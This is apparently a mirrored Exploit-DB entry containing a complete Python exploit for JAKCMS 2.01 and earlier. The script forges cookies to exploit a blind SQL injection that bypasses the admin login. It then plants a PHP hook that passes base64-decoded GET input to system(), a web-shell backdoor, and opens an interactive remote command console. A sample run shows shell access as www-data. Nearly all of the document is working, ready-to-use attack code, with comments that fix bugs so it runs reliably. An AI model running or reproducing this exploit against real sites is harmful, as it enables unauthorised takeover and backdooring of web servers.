JAKCMS 2.01 – Code Execution

  • 作者: mr_me
    日期: 2011-02-20
  • 来源:https://www.exploit-db.com/exploits/16200/
  • #!/usr/bin/python
    #
    # JAKCMS <= v2.01 Code Execution Exploit
    # Explanation:
    #
    # During the authentication process, a check is performed to ensure that the user accessing the page is not already logged in.
    # This process is done by validating the cookies set in the browser as 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS'. If the cookies
    # are found to be set, then an SQL statement is executed to help validate if the user is logged in. This functionality contains
    # a blind SQL Injection vulnerability (the cookie values are concatenated directly into the query string), triggerable through
    # both the 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS' variables.
    #
    # If the injected cookie values form a syntactically valid query that returns at least one row, the user is granted access to the
    # administrative console by setting the session variable 'JAKLoggedIn' to true; the only credential check is the query itself.
    # Below is a snippet of code from the 'class/class.userlogin.php' page on lines 65-76 highlighting the vulnerable code.
    #
    # public static function jakChecklogged()
    # {
    #global $jakdb;
    #if ((isset($_COOKIE['JAK_COOKIE_NAME']) && isset($_COOKIE['JAK_COOKIE_PASS'])) || isset($_SESSION['JAKLoggedIn'])) {
    # $sql = 'SELECT * FROM '.DB_PREFIX.'user WHERE ((username = "'.COOKIE_NAME.'" AND password = "'.COOKIE_PASS.'") OR (sessi$
    # $result = $jakdb->query($sql);
    # if ($jakdb->affected_rows > 0) {
    #$row = $result->fetch_assoc();
    #$_SESSION['JAKLoggedIn'] = true;
    #
    # Additionally, functionality in the backend allows an administrative user to add a "php_hook", i.e. attach PHP code to a
    # page on the website. Chained with the cookie injection above, this lets an attacker backdoor the website in a single request.
    #
    # [mr_me@pluto jak]$ python jakcmsCodeExecution.py -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/
    #
    #	| ------------------------------------------- |
    #	| JAKcms <= v2.01 0day Code Execution Explo!t |
    #	| by mr_me - net-ninja.net ------------------ |
    #
    # (+) Testing proxy @ localhost:8080.. proxy is found to be working!
    # (+) Targeting http://192.168.1.7/
    # (!) Exploit working!
    # (+) Entering interactive remote console (q for quit)
    #
    # mr_me@192.168.1.7# id
    # uid=33(www-data) gid=33(www-data) groups=33(www-data)
    # 
    # mr_me@192.168.1.7# uname -a
    # Linux steven-desktop 2.6.32-28-generic #55-Ubuntu SMP Mon Jan 10 21:21:01 UTC 2011 i686 GNU/Linux
    # 
    # mr_me@192.168.1.7# q 
    
    import sys
    import urllib
    import re
    import urllib2
    import getpass
    import base64
    from optparse import OptionParser
    
    usage = "./%prog [<options>] -t [target] -d [directory]"
    usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/"
    
    parser = OptionParser(usage=usage)
    parser.add_option("-p", type="string",action="store", dest="proxy",
    help="HTTP Proxy <server:port>")
    parser.add_option("-t", type="string", action="store", dest="target",
    help="The Target server <server:port>")
    parser.add_option("-d", type="string", action="store", dest="dirPath",
    help="Directory path to the CMS")
    
    (options, args) = parser.parse_args()
    
    def banner():
        """Write the tool banner to stdout: a blank line, three tab-indented
        box lines, and a trailing blank line."""
        rows = (
            "",
            "\t| -------------------------------------- |",
            "\t| JAKcms <= v2.01 Code Execution Explo!t |",
            "\t| by mr_me - net-ninja.net ------------- |",
            "",
        )
        # One write instead of three print statements; output is byte-identical.
        sys.stdout.write("\n".join(rows) + "\n")
    
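    # Bail out early when the mandatory options are missing.  The argv count
    # alone is not enough: `-p host:port -t host` has five tokens but no -d,
    # and would later crash in doEvilRequest() when options.dirPath (None) is
    # concatenated into the URL.
    if len(sys.argv) < 5 or not options.target or not options.dirPath:
        banner()
        parser.print_help()
        sys.exit(1)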
    
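    def testProxy(probe_url="http://www.google.com/", timeout=10):
        """Check that the proxy given with -p forwards plain HTTP, or exit.

        Sends one GET for ``probe_url`` through ``options.proxy`` and reports
        the outcome on stdout.  Any request failure (unreachable proxy, HTTP
        error status, timeout) aborts the script with exit status 1, since every
        later request would go through the same proxy.

        Parameters:
          probe_url: URL fetched through the proxy.  The default is a
                     third-party host, so the probe is visible to it and to the
                     proxy operator; pass another URL if that matters.
          timeout:   seconds to wait for the proxied request before failing,
                     instead of hanging indefinitely on a dead proxy.
        """
        sys.stdout.write("(+) Testing proxy @ %s.. " % options.proxy)
        sys.stdout.flush()
        try:
            req = urllib2.Request(probe_url)
            req.set_proxy(options.proxy, "http")
            urllib2.urlopen(req, timeout=timeout).close()
        except Exception as exc:
            # Only real request failures are treated as "proxy broken";
            # KeyboardInterrupt/SystemExit still propagate (the bare `except:`
            # this replaces swallowed them too).  Report why, not just that.
            print("proxy failed (%s), exiting.." % exc)
            sys.exit(1)
        sys.stdout.write("proxy is found to be working!\n")
        sys.stdout.flush()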
    
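    def interactiveAttack():
        """Run a minimal read-eval-print loop against the planted PHP hook.

        Each line typed at the prompt is base64-encoded and sent as the ``lol``
        query parameter of ``index.php?p=sitemap``; the hook installed by
        doEvilRequest() decodes it and passes it to ``system()``.  The response
        body before the page's ``<!DOCTYPE html`` is printed as the command
        output.  Typing ``q`` (or sending EOF) leaves the loop without sending
        anything to the target.
        """
        print("(+) Entering interactive remote console (q for quit)\n")
        prompt = "%s@%s# " % (getpass.getuser(), options.target)
        base_url = options.target + options.dirPath + "index.php?p=sitemap&lol="
        while True:
            try:
                command = raw_input(prompt)
            except EOFError:
                # Ctrl-D: leave cleanly instead of dying with a traceback.
                print("")
                break
            if command == "q":
                # The original loop only tested for 'q' *after* sending it, so
                # the quit keyword was executed on the remote host as a command.
                break
            # base64 output contains '+', '/' and '='.  A raw '+' in a query
            # string is decoded to a space by PHP's $_GET, corrupting the
            # payload, so the token is percent-encoded before it goes on the URL.
            encoded = urllib.quote(base64.b64encode(command), safe="")
            response = getServerResponse(base_url + encoded, "", "")
            print(response.split("<!DOCTYPE html")[0])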
    
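    def getServerResponse(exploit, header=None, data=None):
        """Send one HTTP request to ``http://<exploit>`` and return the body.

        Parameters:
          exploit: host[:port] plus path and query string, without the scheme.
          header:  value for a ``Cookie`` request header.  ``None`` sends no
                   cookie; an empty string still sends an empty Cookie header
                   (the interactive console relies on that being accepted).
          data:    mapping or sequence of pairs to form-encode as the POST body.
                   ``None`` makes the request a GET; any other value (even an
                   empty one) produces a POST, as in the original.

        Returns the response body as a str.  A non-2xx status is not fatal: the
        error page's body is returned, because callers inspect the page text.
        A connection-level failure prints a message and exits with status 1.

        The request is routed through ``options.proxy`` when one was given.
        """
        # Fix: `headers` was only assigned inside `if header != None`, so a
        # call with header=None raised UnboundLocalError on the Request line.
        headers = {}
        if header is not None:
            headers["Cookie"] = header
        if data is not None:
            data = urllib.urlencode(data)
        req = urllib2.Request("http://" + exploit, data, headers)
        if options.proxy:
            req.set_proxy(options.proxy, "http")
        try:
            resp = urllib2.urlopen(req)
            try:
                return resp.read()
            finally:
                resp.close()
        # Fix: the original caught urllib.error.HTTPError / URLError, which do
        # not exist in Python 2's urllib, so any HTTP or connection error
        # surfaced as an AttributeError instead of being handled.  HTTPError is
        # a subclass of URLError, so it must be matched first.
        except urllib2.HTTPError as error:
            return error.read()
        except urllib2.URLError:
            print("(-) Target connection failed, check your address")
            sys.exit(1)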
    
    def doEvilRequest():
        """Plant the PHP hook via the admin panel and, on success, open a console.

        The request carries two forged cookies: JAK_COOKIE_PASS is a throwaway
        value, while JAK_COOKIE_NAME closes the quoted username in
        jakChecklogged()'s query and appends ``and 1=1--`` so that the lookup
        returns a row without valid credentials.  The POST body registers a
        ``php_sitemap`` hook whose code executes the base64-decoded ``lol`` query
        parameter.  Success is recognised by the word "Successful" in the
        response; any other response exits the script with status 1.
        """
        print("(+) Targeting http://%s/" % options.target)

        hook_code = "system(base64_decode($_GET['lol']));"
        hook_form = {
            "jak_name": "lol",
            "jak_hook": "php_sitemap",
            "jak_plugin": "0",
            "jak_exorder": "1",
            "jak_phpcode": hook_code,
        }
        forged_cookies = "JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin\"))+and+1=1--+;"
        admin_url = options.target + options.dirPath + "admin/index.php?p=plugins&sp=newhook"

        page = getServerResponse(admin_url, forged_cookies, hook_form)
        if "Successful" not in page:
            print("(-) Exploit failed, exiting..")
            sys.exit(1)
        print("(!) Exploit working!")
        interactiveAttack()
    
    def main():
        """Script entry point: show the banner, verify the proxy if one was
        given with -p, then run the exploit (which opens the console itself)."""
        steps = [banner]
        if options.proxy:
            steps.append(testProxy)
        steps.append(doEvilRequest)
        for step in steps:
            step()
    
    # Run only when executed as a script, not when imported.
    if __name__ == '__main__':
        main()